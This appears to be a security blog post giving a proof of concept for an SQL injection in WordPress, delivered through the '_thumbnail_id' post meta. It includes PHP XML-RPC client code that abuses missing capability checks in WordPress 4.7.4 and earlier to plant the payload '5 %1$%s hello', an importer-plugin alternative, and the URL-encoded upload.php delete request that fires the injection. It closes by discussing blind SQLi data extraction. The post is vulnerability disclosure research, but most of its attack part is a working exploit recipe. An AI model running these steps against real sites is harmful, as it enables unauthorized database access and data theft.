Wordpress SQLi — PoC

In order to understand the writing here, you need to read the previous explanation [https://medium.com/websec/wordpress-sqli-bbb2afcc8e94](https://medium.com/websec/wordpress-sqli-bbb2afcc8e94). If you got it, then we can jump to the part and solve the question e.g. how to update / insert our sql payload into `_thumbnail_id` post meta. ## PoC start - Login to your wordpress as author - Upload image - Remember ID of the image / media - Create post and set image as featured image (this creates `_thumbnail_id` post meta) - Remember the post ID ## Wordpress ≤ 4.7.4 XML-RPC In case of appropriate wordpress version then we can use the third vulnerability in this versions of wordpress [https://wordpress.org/news/2017/05/wordpress-4-7-5/](https://wordpress.org/news/2017/05/wordpress-4-7-5/) e.g. Lack of capability checks for post meta data in the XML-RPC API. This means that we can edit the value of `_thumbnail_id` with the following code ( 6 is the post ID and 5 is image/post ID ) $usr = 'author'; $pwd = 'author'; $xmlrpc = 'http://local.target/xmlrpc.php'; $client = new IXR_Client($xmlrpc); $content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"5 %1$%s hello")); $res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content); and with this code we add the following payload in the DB `5 %1$%s hello` . ## Wordpress importer plugin — any version of wordpress This is another approach for changing the `_thumbnail_id` value in the database. If wordpress instance have enabled this plugin on it, then simple export, change meta value and import will do the job. ## Execute the SQL payload Login to the administration panel with your `author` account, go to media e.g. `http://local.target/wp-admin/upload.php` , grab the `_wpnonce` value and we are ready to prove our SQLi vulnerability. Issue the following request towards your local instance: local.target/wp-admin/upload.php?_wpnonce=daab7cfabf&action=delete&media%5B%5D=5%20%251%24%25s%20hello where `5%20%251%24%25s%20hello` is url encoded `5 %1$%s hello`. This request will result with execution of the following query against the DB (will rise error of course): SELECT post_id FROM wp_postmeta WHERE meta_key = '_thumbnail_id' AND meta_value = '5 _thumbnail_id' hello' This proves the SQLi vulnerability in the wordpress and as mention in previous post value after `5 %1$%s` e.g. `hello` is our payload. ## Is this vulnerability dangerous? SQL injection itself is quite dangerous vulnerability, but sometimes have its own limitations. Here at our case depending of the database server configuration or mysql client used on PHP side could be fatal, but in our case best case scenario would be blind sql injection. Sure, we all know the trivial attack vector, but here we have 2 facts that go against wordpress: - meta value database column type e.g. size constraint - media parameter could be POST parameter e.g. will have huge size This two facts guide us to the conclusion that even with blind sqli one query would be enough to calculate some crucial DB cell value.